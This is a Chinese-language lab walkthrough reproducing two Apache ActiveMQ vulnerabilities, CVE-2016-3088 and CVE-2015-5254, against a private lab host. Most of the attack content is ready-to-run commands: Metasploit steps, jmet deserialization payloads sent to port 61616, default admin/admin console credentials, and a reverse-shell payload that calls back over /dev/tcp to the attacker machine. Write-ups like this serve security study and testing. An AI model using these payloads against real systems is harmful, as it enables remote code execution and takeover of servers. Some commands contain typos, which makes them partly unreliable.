前言
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring framework等。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
靶 机:192.168.4.10_ubuntu
攻击机:192.168.4.29_kali
一、CVE-2016-3088_ActiveMQ任意文件写入漏洞
漏洞详情
本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但将其移动到任意位置,造成任意文件写入漏洞。
文件写入有几种利用方法:
1. 写入webshell
2. 写入cron或ssh key等文件
3. 写入jar或jetty.xml等库和配置文件
漏洞复现
1.启动msf复现
#msfconcle
#search CVE-2016-3088
#Use 0
#Set rhost 192.168.4.10
#Exploit
二、CVE-2015-5254_ActiveMQ 反序列化漏洞
漏洞详情
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
漏洞复现一:上传文件
1. 构造可执行命令的序列化对象,可用ROME,作为消息发送给61616端口
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.4.10 61616
2. 访问web管理页面,查看消息,触发漏洞
http://192.168.4.10:8161/admin/browse.jsp?JMSDestination=event
账户:admin
口令:admin
3. 进入容器,查看,/tem/success利用成功
docker-compose exec activemq bash
复现二:反弹shell
可将命令替换未shell语句利用
1.执行
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.4.29/19111 0>&1" -Yp ROME 192.168.4.10 61616
2. 启动监听
3. 点击触发
4. 反弹shell
